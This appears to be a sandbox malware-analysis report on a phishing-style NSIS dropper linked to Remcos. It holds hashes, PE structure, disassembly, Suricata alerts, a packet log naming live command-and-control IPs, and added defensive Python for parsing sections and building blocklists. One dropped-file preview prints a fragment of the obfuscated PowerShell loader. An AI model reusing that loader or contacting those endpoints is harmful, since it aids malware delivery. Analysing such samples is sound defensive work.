                                                            Encrypted:false
                                                            SSDEEP:768:HG4zGp2v5B9pNmzcIKyHhI8sz7YQcjekdzjECZsTbSmxOR46e5HIcOuWofyVRHXB:t/6
                                                            MD5:6BF42A0A5D506264C42F0A8FF53E718E
                                                            SHA1:8A33E324C152756DA8AA50E351B4C9C92458AB80
                                                            SHA-256:D8F4ECA0C0A30915ED44DB12CE1F356D3532E71E324B2B86FB71A61630FF16B7
                                                            SHA-512:5C1E92EA9CCAF82777A384CA868C319DD3400A910934F6B606FCC4A4E0F1EA6D52027D85169556F021432E0D6346223979D518689DA79A75EE61D046648056B2
                                                            Malicious:false
                                                            Preview:..........................................................................................................@...........................................................................................................................................................................................................................................................................................................................................&............................................................\..........................................................................................................................................................................................................................................@.........................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (4103), with CRLF, LF line terminators
                                                            Category:dropped
                                                            Size (bytes):67851
                                                            Entropy (8bit):5.200952359090072
                                                            Encrypted:false
                                                            SSDEEP:1536:5nwHnOdDQ4hfsf/cyOEmWjVallBMABHiZyrVMRk:hwudDYbfjVNZmV2k
                                                            MD5:1280D41310C4A2EEAE634EC8DC22FCC8
                                                            SHA1:D8A0986CD4FDFAAE54FFD0B3B015FECB343A93A9
                                                            SHA-256:8431F4E8DA30962CB0082804B30B01485FB8927E2CBE4012A321AA4E8F09AC1E
                                                            SHA-512:9644B502EFC90A956402AAAC90BE1961C48D897A74CE60326BA26FA459290F6C714366F2C56E7EF7C0FD31A6A51498D1EB2D74E7B0035F0ADFC5F9D24C5A0FC5
                                                            Malicious:true
                                                            Preview:$Labrose132=$disoriented;........$Picnometre = @'. ,echno.Cruddie$Boligk SSympatie SmleruvC riandeA.ticlirCrohvidiBrudentnCilies gInsuffilP desneyLandfstlIncorrimSilkeoreNatr umnIndte pn fellowy osbrvit.horepitRedemoni Rendejg Pe cust,oticer=Sintrin$SneppenT pdaterrunmargik KommunkAfkodereSlumptrnAcanthoaProtocoaDatakomlLeksikoeUdtvremnRecert eBouil.o;He ilei.AtionsvfDdvandeuA rophynAcrogamcUligevgt Obsk ri Char eo DetermnDelikat UncritiM ProdukeStabelprS erliniForbarmnEpizz agMassrenuMetroereI atinesKerneop Affinit(Calling$SemimalSNekkarse bambusv.ysstyreKvali irUnassumiKurtagenUdd,nneg overgelKlas ify skelet, Diapho$WeymoutS Sal,inuTredeles Miavt aTrindtbnAfstt lnDiolsdaeCaromsf5Overfar3forbere)Sondred Indbygg{Te rapn.underud. Stnket$ GeneraSEthnogreCystoidrEjeranddVaske laHersk.bbUnderf Bystend(Kl mrenCPronouniFodr ndoF,milien Hedgewo DisanicHelmut,r B,ankiaAutomatn HenotiiWavinglaSkovlvolBorduns Depreci'Stra feNHighnesoMessiasn LignineDgncentsCarc.sepOperat i fanden$Nnere rTCitro
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4452491
                                                            Entropy (8bit):0.15755416186137736
                                                            Encrypted:false
                                                            SSDEEP:768:dcQDlfI1V+H0C0cnDtbLdHPWfWYefayfCUel0BcvR+7D6xUtH1W0mtLhIplZAicU:xzpxZ
                                                            MD5:23FBA11F197C3671FEC5F037ED860A34
                                                            SHA1:00268C2C72B421CA022770C859FDA9C87610ED0B
                                                            SHA-256:09192DE63A90EA42794CCD244E51DE7F64EA2B4A59FF371B0DA6DD713DA0CC6A
                                                            SHA-512:B79F022A6FFCD7F697FA3FD878F9920AFB5C39F02F8B7799B5E240A94AE9881B43F2D62F1B26D867A9F71B17F9D71EDD3DE2871825381F679805B38722330DF0
                                                            Malicious:false
                                                            Preview:........................................Z...........................................................................................................................................................................................................................................................................................................................................................d.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.............................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):55
                                                            Entropy (8bit):4.306461250274409
                                                            Encrypted:false
                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                            Malicious:false
                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):7.779209859352386
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:RFQ NO 65-58003.exe
                                                            File size:839'544 bytes
                                                            MD5:e4e7b853e87922ff59bcae3527b206f9
                                                            SHA1:15e8dc7771a5b9ebeae4b64ccc20a8d9798158c2
                                                            SHA256:b4b7eab942bf5ffa93bef1444c82b059d3c18234bcec49df9ec2294bf0ec66bd
                                                            SHA512:92406ea4aa0b16b825a776756fd875cc1d224144666c56fe6a7fb3ca6d8f0090adeb3e6e1a07bddd83ef1e2b9dda382fa50738ccb78a3f3f73245a330da8be4c
                                                            SSDEEP:12288:3zpSYVj1vkBEu7i6rcdUYH+pIpHjGERkr1w0ZS8atGZnnBIjLNA8xrduQg9eC:9SYkWuO6dcQIpDJ2ZVnaFP5qEC
                                                            TLSH:23051281F714C997F8E3AE3D4E495E919F5069B8D480D30A21E93BAD3AF2730894A7C5
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@
                                                            Icon Hash:000204191163061d
                                                            Entrypoint:0x40344a
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:4ea4df5d94204fc550be1874e1b77ea7
                                                            Signature Valid:false
                                                            Signature Issuer:CN=Behattet, E=Misforstaaelsernes@Brndforgiftninge.Bru, O=Behattet, L=Locust Valley, OU="Scholasm Maanedskortets Lfteparagraffers ", S=New York, C=US
                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                            Error Number:-2146762487
                                                            Not Before, Not After
                                                            • 23/04/2024 06:10:41 23/04/2025 06:10:41
                                                            Subject Chain
                                                            • CN=Behattet, E=Misforstaaelsernes@Brndforgiftninge.Bru, O=Behattet, L=Locust Valley, OU="Scholasm Maanedskortets Lfteparagraffers ", S=New York, C=US
                                                            Version:3
                                                            Thumbprint MD5:E6F7CCB478DEB87ACBB9BF461C91FD4A
                                                            Thumbprint SHA-1:2378829B38ACD98D8AE8B282E7E9856987802232
                                                            Thumbprint SHA-256:B3E9A7181DA2C5EC3C5F59ABF713A2CFE3AEA5B518EC2EB52246C63D704396D8
                                                            Serial:232D6846CEABAA60D5E84DBF91890837F1103974
                                                            Instruction
                                                            sub esp, 000002D4h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            pop edi
                                                            xor ebx, ebx
                                                            push 00008001h
                                                            mov dword ptr [esp+14h], ebx
                                                            mov dword ptr [esp+10h], 0040A230h
                                                            mov dword ptr [esp+1Ch], ebx
                                                            call dword ptr [004080B4h]
                                                            call dword ptr [004080B0h]
                                                            cmp ax, 00000006h
                                                            je 00007F9D30820C13h
                                                            push ebx
                                                            call 00007F9D30823D6Ch
                                                            cmp eax, ebx
                                                            je 00007F9D30820C09h
                                                            push 00000C00h
                                                            call eax
                                                            mov esi, 004082B8h
                                                            push esi
                                                            call 00007F9D30823CE6h
                                                            push esi
                                                            call dword ptr [0040815Ch]
                                                            lea esi, dword ptr [esi+eax+01h]
                                                            cmp byte ptr [esi], 00000000h
                                                            jne 00007F9D30820BECh
                                                            push ebp
                                                            push 00000009h
                                                            call 00007F9D30823D3Eh
                                                            push 00000007h
                                                            call 00007F9D30823D37h
                                                            mov dword ptr [0042A244h], eax
                                                            call dword ptr [0040803Ch]
                                                            push ebx
                                                            call dword ptr [004082A4h]
                                                            mov dword ptr [0042A2F8h], eax
                                                            push ebx
                                                            lea eax, dword ptr [esp+34h]
                                                            push 000002B4h
                                                            push eax
                                                            push ebx
                                                            push 004216E8h
                                                            call dword ptr [00408188h]
                                                            push 0040A384h
                                                            push 00429240h
                                                            call 00007F9D30823920h
                                                            call dword ptr [004080ACh]
                                                            mov ebp, 00435000h
                                                            push eax
                                                            push ebp
                                                            call 00007F9D3082390Eh
                                                            push ebx
                                                            call dword ptr [00408174h]
                                                            add word ptr [eax], 0000h
                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x50000 | 0x17788 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0xcc7f0 | 0x788 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x61f1        0x6200    2ce901035717865394b5faeda5b43e0f  False     0.6656967474489796  data       6.477074763411717   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x13a4        0x1400    4ac891d4ddf58633f14436f9f80ac6b6  False     0.4529296875        data       5.163001655755973   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x20338       0x600     df898dbdc013374b871e011dcd904b20  False     0.501953125         data       3.9745558434885093  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x2b000          0x25000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x50000          0x17788       0x17800   9a8320a105424ee3931a3b49e74f1e10  False     0.16107047872340424 data       3.87775241222699    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
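Added example, not part of the Joe Sandbox report: a small parser that rebuilds the section table above from raw IMAGE_SECTION_HEADER bytes, computes the same bits-per-byte entropy the Entropy column uses, and checks the two things a triage analyst would want from these numbers: which sections occupy memory without backing bytes on disk (.ndata has raw size 0 but 0x25000 bytes virtual, .data is 0x20338 virtual against 0x600 raw) and how far the Authenticode blob at 0xcc7f0 sits beyond the end of section data, which is the size of the overlay. Names, sizes, RVAs and characteristics are taken from the report; PointerToRawData values are not on the page and are assumed here, as are the 4x virtual/raw ratio and the entropy buckets, which are this example's own heuristics.

```python
"""Parse a PE section table and sanity-check it against the data directory."""
import math
import struct
from collections import Counter
from dataclasses import dataclass

# IMAGE_SECTION_HEADER, 40 bytes: Name[8], VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics.
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


@dataclass
class Section:
    name: str
    vsize: int
    va: int
    rawsize: int
    rawptr: int
    chars: int


def pack_section(name, vsize, va, rawsize, rawptr, chars) -> bytes:
    return SECTION_HDR.pack(name.encode("ascii").ljust(8, b"\0"),
                            vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)


# Constructed section table. Names, sizes, RVAs and characteristics are the ones in the
# report's section table; PointerToRawData is not on the page, so the file offsets are
# ASSUMED (contiguous, 0x200-aligned, headers occupying the first 0x400 bytes).
SECTION_TABLE = b"".join([
    pack_section(".text", 0x61f1, 0x1000, 0x6200, 0x400,
                 IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    pack_section(".rdata", 0x13a4, 0x8000, 0x1400, 0x6600,
                 IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    pack_section(".data", 0x20338, 0xa000, 0x600, 0x7a00,
                 IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    pack_section(".ndata", 0x25000, 0x2b000, 0x0, 0x0,
                 IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    pack_section(".rsrc", 0x17788, 0x50000, 0x17800, 0x8000,
                 IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])

# IMAGE_DIRECTORY_ENTRY_SECURITY from the report. Unlike the other directories its
# "virtual address" is a raw file offset, which is why no section is listed for it.
SECURITY_DIR_OFFSET = 0xCC7F0
SECURITY_DIR_SIZE = 0x788


def parse_sections(blob: bytes) -> list:
    out = []
    for off in range(0, len(blob) - SECTION_HDR.size + 1, SECTION_HDR.size):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = SECTION_HDR.unpack_from(blob, off)
        out.append(Section(name.rstrip(b"\0").decode("ascii"), vsize, va, rawsize, rawptr, chars))
    return out


def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0.0 to 8.0), the scale used by the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def end_of_section_data(sections) -> int:
    return max(s.rawptr + s.rawsize for s in sections)


def overlay_before_offset(sections, offset: int) -> int:
    """Bytes between the end of the last section's raw data and a file offset."""
    return max(0, offset - end_of_section_data(sections))


def section_findings(sections) -> list:
    """Sections whose memory footprint is not backed by bytes on disk, plus RWX sections."""
    findings = []
    for s in sections:
        if s.chars & IMAGE_SCN_MEM_EXECUTE and s.chars & IMAGE_SCN_MEM_WRITE:
            findings.append((s.name, "writable and executable"))
        if s.rawsize == 0 and s.vsize:
            findings.append((s.name, f"no bytes on disk, {s.vsize:#x} bytes zero-filled at load"))
        elif s.vsize > 4 * s.rawsize:  # 4x is this example's own threshold
            findings.append((s.name, f"virtual size {s.vsize:#x} far exceeds raw size {s.rawsize:#x}"))
    return findings


def entropy_rating(bits: float) -> str:
    """Rough buckets: compiled x86 code usually lands near 6, packed/encrypted data above 7."""
    if bits >= 7.0:
        return "high (packed/encrypted?)"
    if bits >= 5.5:
        return "typical code"
    return "low (sparse/structured data)"


if __name__ == "__main__":
    secs = parse_sections(SECTION_TABLE)
    for s in secs:
        print(f"{s.name:7} va={s.va:#08x} vsize={s.vsize:#07x} raw={s.rawsize:#07x} chars={s.chars:#010x}")
    for name, why in section_findings(secs):
        print("finding:", name, why)
    print(f"overlay before signature: {overlay_before_offset(secs, SECURITY_DIR_OFFSET):#x} bytes")
    print("256 distinct bytes ->", shannon_entropy(bytes(range(256))), "bits/byte")
```

With the assumed offsets the overlay before the signature comes out at 0xacff0 bytes, several times the size of all mapped sections together; for an installer-style stub that overlay is where the payload lives, so it is the part to carve and inspect next rather than the sections themselves.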
Name           RVA      Size     Type                                                                               Language  Country        ZLIB Complexity
RT_ICON        0x503b8  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 0                    English   United States  0.11695551875073938
RT_ICON        0x60be0  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 0                      English   United States  0.22240663900414936
RT_ICON        0x63188  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 0                      English   United States  0.29924953095684803
RT_ICON        0x64230  0xea8    Device independent bitmap graphic, 48 x 96 x 8, image size 0                       English   United States  0.23480810234541577
RT_ICON        0x650d8  0x8a8    Device independent bitmap graphic, 32 x 64 x 8, image size 0                       English   United States  0.23826714801444043
RT_ICON        0x65980  0x668    Device independent bitmap graphic, 48 x 96 x 4, image size 0                       English   United States  0.24390243902439024
RT_ICON        0x65fe8  0x568    Device independent bitmap graphic, 16 x 32 x 8, image size 0                       English   United States  0.25
RT_ICON        0x66550  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 0                      English   United States  0.5567375886524822
RT_ICON        0x669b8  0x2e8    Device independent bitmap graphic, 32 x 64 x 4, image size 0                       English   United States  0.30510752688172044
RT_ICON        0x66ca0  0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 0                       English   United States  0.5
RT_DIALOG      0x66dc8  0x140    data                                                                               English   United States  0.471875
RT_DIALOG      0x66f08  0x11c    data                                                                               English   United States  0.6091549295774648
RT_DIALOG      0x67028  0xc4     data                                                                               English   United States  0.5918367346938775
RT_DIALOG      0x670f0  0x60     data                                                                               English   United States  0.7291666666666666
RT_GROUP_ICON  0x67150  0x92     data                                                                               English   United States  0.6301369863013698
RT_VERSION     0x671e8  0x25c    data                                                                               English   United States  0.5198675496688742
RT_MANIFEST    0x67448  0x33e    XML 1.0 document, ASCII text, with very long lines (830), with no line terminators  English   United States  0.5542168674698795
DLL           Import
KERNEL32.dll  SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll    GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll     SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll   SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll  RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll  ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll     OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system  Country where language is spoken
English                         United States
Timestamp                        SID      Signature                                            Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-18T11:05:13.562414+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa  2         192.168.2.6  49868        212.162.149.92  80         TCP
2024-12-18T11:05:16.487668+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection          1         192.168.2.6  49874        212.162.149.91  2404       TCP
2024-12-18T11:05:18.671683+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection          1         192.168.2.6  49880        212.162.149.91  2404       TCP
2024-12-18T11:05:18.878131+0100  2803304  ETPRO MALWARE Common Downloader Header Pattern HCa   3         192.168.2.6  49881        178.237.33.50   80         TCP
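Added example, not part of the Joe Sandbox report: the Suricata rows above and the per-packet rows that follow are the raw material for two routine incident-response steps, turning the alerts into a blocklist of C2 endpoints and reconstructing each TCP flow (client side, packet counts per direction, duration) so that an alert can be tied back to the connection that triggered it. The alert records and the packet lines embedded below are copied from the report's values (only the first five packet rows, whitespace-separated); the record layout, the "first packet defines the client" rule and the Remcos-signature filter are this example's own.

```python
"""Correlate Suricata alert rows with a sandbox's per-packet log."""
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class Alert:
    ts: str
    sid: int
    signature: str
    severity: int   # Suricata priority: 1 is the most severe
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str


@dataclass
class FlowStats:
    first: datetime
    last: datetime
    out_packets: int = 0   # client -> server
    in_packets: int = 0    # server -> client

    def duration_s(self) -> float:
        return (self.last - self.first).total_seconds()


# Alert rows as listed in the report's Suricata table (values copied, record layout is ours).
ALERTS = [
    Alert("2024-12-18T11:05:13.562414+0100", 2803270,
          "ETPRO MALWARE Common Downloader Header Pattern UHCa", 2,
          "192.168.2.6", 49868, "212.162.149.92", 80, "TCP"),
    Alert("2024-12-18T11:05:16.487668+0100", 2036594,
          "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1,
          "192.168.2.6", 49874, "212.162.149.91", 2404, "TCP"),
    Alert("2024-12-18T11:05:18.671683+0100", 2036594,
          "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1,
          "192.168.2.6", 49880, "212.162.149.91", 2404, "TCP"),
    Alert("2024-12-18T11:05:18.878131+0100", 2803304,
          "ETPRO MALWARE Common Downloader Header Pattern HCa", 3,
          "192.168.2.6", 49881, "178.237.33.50", 80, "TCP"),
]

# First five rows of the report's packet table: timestamp, source port, dest port,
# source IP, dest IP (constructed sample input, whitespace-separated).
PACKET_LOG = """\
Dec 18, 2024 11:05:12.288048029 CET 49868 80 192.168.2.6 212.162.149.92
Dec 18, 2024 11:05:12.407604933 CET 80 49868 212.162.149.92 192.168.2.6
Dec 18, 2024 11:05:12.407720089 CET 49868 80 192.168.2.6 212.162.149.92
Dec 18, 2024 11:05:12.408065081 CET 49868 80 192.168.2.6 212.162.149.92
Dec 18, 2024 11:05:12.527532101 CET 80 49868 212.162.149.92 192.168.2.6
"""


def parse_packet_line(line: str):
    """Return (timestamp, src_ip, src_port, dst_ip, dst_port) for one packet row."""
    stamp, sport, dport, src, dst = line.rsplit(None, 4)
    # The log carries nanoseconds; datetime only takes microseconds, so truncate.
    date_part, frac_tz = stamp.rsplit(".", 1)
    frac = frac_tz.split()[0][:6]
    ts = datetime.strptime(f"{date_part}.{frac}", "%b %d, %Y %H:%M:%S.%f")
    return ts, src, int(sport), dst, int(dport)


def parse_packets(text: str):
    return [parse_packet_line(l) for l in text.splitlines() if l.strip()]


def flow_stats(packets):
    """Group packets into flows keyed by (client_ip, client_port, server_ip, server_port).

    The first packet seen between two endpoints defines the client side; in a sandbox
    capture that is the guest opening the connection.
    """
    flows = {}
    for ts, src, sport, dst, dport in packets:
        fwd = (src, sport, dst, dport)
        rev = (dst, dport, src, sport)
        if fwd in flows:
            st = flows[fwd]
            st.out_packets += 1
        elif rev in flows:
            st = flows[rev]
            st.in_packets += 1
        else:
            st = flows[fwd] = FlowStats(first=ts, last=ts)
            st.out_packets += 1
        st.first = min(st.first, ts)
        st.last = max(st.last, ts)
    return flows


def alerts_for_flow(alerts, key):
    return [a for a in alerts if (a.src_ip, a.src_port, a.dst_ip, a.dst_port) == key]


def c2_endpoints(alerts, family="Remcos"):
    """Distinct server endpoints named by a family-specific signature, ready for a blocklist."""
    return sorted({(a.dst_ip, a.dst_port) for a in alerts if family in a.signature})


def most_severe(alerts):
    return min(alerts, key=lambda a: a.severity)


if __name__ == "__main__":
    stats = flow_stats(parse_packets(PACKET_LOG))
    for key, st in stats.items():
        sids = [a.sid for a in alerts_for_flow(ALERTS, key)]
        print(key, "out", st.out_packets, "in", st.in_packets, f"{st.duration_s():.6f}s", "sids", sids)
    print("C2 endpoints:", c2_endpoints(ALERTS))
    print("highest priority alert:", most_severe(ALERTS).signature)
```

Keying flows on the full 4-tuple rather than on destination IP alone matters here: the two JA3 hits are separate connections (client ports 49874 and 49880) to the same 212.162.149.91:2404 endpoint, and the two "Common Downloader Header Pattern" hits go to different hosts, so a per-endpoint blocklist and a per-flow alert lookup answer different questions.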
Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Dec 18, 2024 11:05:12.288048029 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:12.407604933 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:12.407720089 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:12.408065081 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:12.527532101 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.562342882 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.562391043 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.562407017 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.562413931 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.562444925 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.562452078 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.562465906 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.562483072 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.562510967 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.562517881 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.600733042 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.600801945 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.600816011 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.600840092 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.600877047 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.600914955 CET  80        49868     212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:13.600919962 CET  49868     80        192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:13.600919962 CET  49868     80        192.168.2.6      212.162.149.92
